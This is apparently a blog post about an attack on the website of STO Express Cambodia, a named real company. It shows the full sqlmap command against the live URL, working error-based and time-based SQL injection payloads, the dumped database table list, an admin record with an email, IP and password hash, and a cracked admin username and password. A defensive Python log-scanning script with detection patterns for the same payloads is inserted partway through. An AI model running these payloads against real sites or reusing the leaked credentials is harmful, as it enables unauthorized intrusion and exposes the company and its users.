A hands-on penetration test of STO Express Cambodia
Published: 2022-03-31 | Category: Penetration testing
sqlmap -u "http://www.stocambodia.com/search.php?act=detail&bglxid=972%E9%8E%88%27%22%5C%28&cc=4111111111111111%2C&city=&country=NSW%E6%96%B0%E5%8D%97%E5%A8%81%E5%B0%94%E5%A3%AB%E5%B7%9E&czcc=1&gg=1%2C&js=1%2C&kk=1%2C&weight=1%2C&youbian=" -p bglxid -D shentong --tables --batch

[Screenshot 2022-03-31 21.55.20]

Penetration test, part 1: dumping the database

---
Parameter: bglxid (GET)
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
Payload: act=detail&bglxid=-7745 OR 1 GROUP BY CONCAT(0x716a707671,(SELECT (CASE WHEN (4657=4657) THEN 1 ELSE 0 END)),0x71626a7671,FLOOR(RAND(0)*2)) HAVING MIN(0)#&cc=4111111111111111,&city=&country=NSW%E6%96%B0%E5%8D%97%E5%A8%81%E5%B0%94%E5%A3%AB%E5%B7%9E&czcc=1&gg=1,&js=1,&kk=1,&weight=1,&youbian=

Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: act=detail&bglxid=(SELECT 7733 FROM (SELECT(SLEEP(5)))tfTu)&cc=4111111111111111,&city=&country=NSW%E6%96%B0%E5%8D%97%E5%A8%81%E5%B0%94%E5%A3%AB%E5%B7%9E&czcc=1&gg=1,&js=1,&kk=1,&weight=1,&youbian=
---
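The two techniques sqlmap reports above, an error-based probe built on FLOOR(RAND(0)*2) inside GROUP BY ... HAVING and a time-based probe built on SLEEP(), both travel in the bglxid query parameter and therefore leave recognisable traces in the web server's access log. The following is an added example, not code from the original post: it parses constructed Apache combined-format log lines (the lines, IPs and the flag_sqli_requests function are assumptions for illustration) and flags requests whose bglxid value carries either signature.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed log lines (not real logs). The first two echo the error-based and
# time-based probes sqlmap reported for bglxid; the third is a normal request
# that must not be flagged.
SAMPLE_LOG = """\
10.0.0.5 - - [31/Mar/2022:21:55:20 +0800] "GET /search.php?act=detail&bglxid=-7745%20OR%201%20GROUP%20BY%20CONCAT(0x716a707671,(SELECT%20(CASE%20WHEN%20(4657=4657)%20THEN%201%20ELSE%200%20END)),0x71626a7671,FLOOR(RAND(0)*2))%20HAVING%20MIN(0)%23&cc=4111111111111111, HTTP/1.1" 500 1532 "-" "sqlmap/1.6"
10.0.0.5 - - [31/Mar/2022:21:55:26 +0800] "GET /search.php?act=detail&bglxid=(SELECT%207733%20FROM%20(SELECT(SLEEP(5)))tfTu)&cc=4111111111111111, HTTP/1.1" 200 8120 "-" "sqlmap/1.6"
10.0.0.9 - - [31/Mar/2022:21:57:01 +0800] "GET /search.php?act=detail&bglxid=972&cc=4111111111111111, HTTP/1.1" 200 8120 "-" "Mozilla/5.0"
"""

# Apache "combined" format: ip ident user [time] "method target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) (\S+)" (\d{3}) (\S+) "([^"]*)" "([^"]*)"$'
)

# Signatures for the two sqlmap techniques shown in the output above, matched on the
# URL-decoded parameter value. Order matters: the first match wins per request.
SIGNATURES = [
    ("error-based FLOOR/RAND", re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*\d*\s*\)\s*\*\s*2\s*\)", re.I)),
    ("time-based SLEEP", re.compile(r"\bSLEEP\s*\(\s*\d+(?:\.\d+)?\s*\)", re.I)),
]


def flag_sqli_requests(log_text, param="bglxid"):
    """Return (client_ip, technique, user_agent) for each request whose `param`
    value matches a signature; clean requests produce no entry."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in combined format; skip rather than guess
        ip, _ts, _method, target, _proto, _status, _size, _ref, ua = m.groups()
        # parse_qsl percent-decodes values, so encoded spaces and '#' are visible
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            if name != param:
                continue
            for technique, pattern in SIGNATURES:
                if pattern.search(value):
                    hits.append((ip, technique, ua))
                    break
    return hits


if __name__ == "__main__":
    for ip, technique, ua in flag_sqli_requests(SAMPLE_LOG):
        print(f"{ip}\t{technique}\t{ua}")
```

The two probe lines are reported and the ordinary bglxid=972 request is not; a real deployment would extend the signature list and feed every query parameter, not only the one sqlmap found injectable.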

Tables with the most records:

Database: shentong
+------------------------+---------+
| Table | Entries |
+------------------------+---------+
| ecs_stats | 354977 |
| ecs_admin_log | 273014 |
| ecs_zzfw_list | 186535 |
| ecs_route | 87329 |
| ecs_pianyuan_xq | 85356 |
| ecs_order_income | 37977 |
| ecs_order_outcome | 31605 |
| ecs_bank_info | 28552 |
| ecs_sessions_data | 17238 |
| ecs_jifen_log_copy1 | 15496 |
| ecs_keywords | 8361 |
| ecs_jifen_user_copy1 | 5374 |
| ecs_jifen_user_copy | 4882 |
| ecs_wx_message | 3814 |
| ecs_cz_info | 3612 |
| ecs_region | 3408 |
| ecs_qywx_djr | 3051 |
| ecs_bank_zxcb | 2798 |
| ecs_users | 2440 |
| ecs_paisong_czsm | 1713 |
| ecs_pay_log | 1561 |
| ecs_area_copy | 1397 |
| ecs_area | 1326 |
| ecs_jiali | 861 |
| ecs_searchengine | 832 |
| ecs_huojia | 750 |
| ecs_user_address | 553 |
| ecs_reg_extend_info | 442 |
| ecs_post_num_jl | 394 |
| ecs_order_action | 336 |
| ecs_vip_bglx | 335 |
| ecs_types | 301 |
| ecs_admin_action | 286 |
| ecs_order_zhichu | 252 |
| ecs_shop_config | 239 |
| ecs_goods_gallery | 217 |
| ecs_account_log | 213 |
| ecs_shop_config_wap | 191 |
| ecs_ad | 157 |
| ecs_price_gbj | 135 |
| ecs_fencheng_jilu_copy | 124 |
| ecs_fq_copy | 115 |
| ecs_fq | 100 |
+------------------------+---------+

Breaking into the admin backend:

Admin user table: ecs_admin_user

admin1,<blank>,<blank>,1259,525999955@qq.com,0,0,<blank>,2331,96.9.88.251,1634947229,<blank>,331b05b18d04030e9b900c00553d497a,NULL,<blank>,<blank>,0,admin1,1635709960,"

admin1 sto123

[Screenshot 2022-03-31 21.58.56]
